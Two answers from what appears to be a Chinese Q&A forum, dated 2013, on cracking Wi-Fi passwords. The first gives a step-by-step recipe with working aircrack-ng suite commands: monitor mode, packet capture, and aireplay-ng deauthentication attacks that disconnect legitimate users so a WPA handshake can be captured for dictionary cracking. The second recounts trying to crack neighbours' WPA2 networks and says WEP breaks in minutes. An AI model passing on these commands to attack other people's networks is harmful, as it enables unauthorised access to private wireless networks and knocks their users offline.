第1个回答 2013-10-13
握手包的抓取需要在用户正在拨号时才行。
一般的方法是,在抓包的同时,用deauth攻击,让已经登录的用户断线,然后用户再次登录时就可以抓握手包了。
不要一直攻击,否则合法用户连不上。当pwr显示的合法客户端的数值变为0时,表示他已经掉线了。
这个过程需要多进行几次,得亲自盯着,靠全自动软件是不行的。
sudo ifconfig wlan0
sudo airmon-ng start wlan0
sudo airodump-ng -w test mon0 -c 13
在抓包的同时进行注入攻击
sudo aireplay-ng -0 10 -a "bssid" mon0
抓到握手包后,在airodump显示屏幕的右上角回有显示的,然后可以关闭无线网卡了,在本地用aircrack-ng,挂上字典,进行wpa-psk的破解。
抓握手包只是万里长征的第一步,跑密码是真正的难题。
第2个回答 2013-10-13
同楼上
wpa-psk不是好破解的,放弃吧
wep很脆,几分钟就破了
抓到握手包不难,跑密码字典文件难,几乎没有可能跑出来
我曾经想试过破周围邻居的wpa2,握手包抓到很多
跑了网上下的几个G的字典,跑了两天一个都没破解出来
所以很显然,网上卖那些卡王什么的都是骗人的,那东西里面也没有多大硬盘给存字典文件,就算有,人家出差的用,等它破解完,宾馆又换了,
卡王充其量也只能破解破解wep,我不信它一个嵌入式的东西配置比电脑还厉害.本回答被提问者和网友采纳